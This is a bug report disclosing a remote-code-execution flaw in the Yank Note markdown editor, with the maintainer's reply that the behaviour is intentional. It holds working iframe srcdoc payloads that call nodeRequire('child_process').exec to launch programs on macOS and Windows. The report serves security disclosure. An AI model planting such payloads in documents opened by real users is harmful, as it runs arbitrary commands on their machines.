[BUG]: Yank Note Remote Code Execution via Iframe

[aht7525]

Author: bob11.devranger@gmail.com
Data: 2022-11-08
OS: Windows, Linux, MacOS
YN Version : v3.43.0

Summary

---

It is possible to load nodeRequire using iframe.

Description

---

[1] We found that javascript execution is possible by adding a script tag using srcdoc, an option of the iframe tag.

<iframe srcdoc="<script>alert(1)</script>"></iframe>

[2] And we found that it is possible to load nodeJS from JavaScript through nodeRequire. This enabled Remote Code Execution.

mac : <iframe srcdoc="<script>top.nodeRequire('child_process').exec('open -a /System/Applications/Calculator.app')</script>"></iframe>

windows : <iframe srcdoc="<script>top.nodeRequire('child_process').exec('calc')</script>"></iframe>

what’s more

• You can see this poc video : https://drive.google.com/file/d/1RdWDTbgY1wpO61FdqEkrt6ugcZRFnQ09/view?usp=sharing
• If you have any problems, contact me via aht5886@gmail.com or bob11.devranger@gmail.com
• Thank you :)

[purocean]

Thank you for you test. These security issues are known and intentional.

Yank Note positioning is not only a markdown editor, but also a highly open hacker's toy. You can even use it to control a drone.

I have put a warning in the README, and It also does not support opening files directly. You use it at your own risk.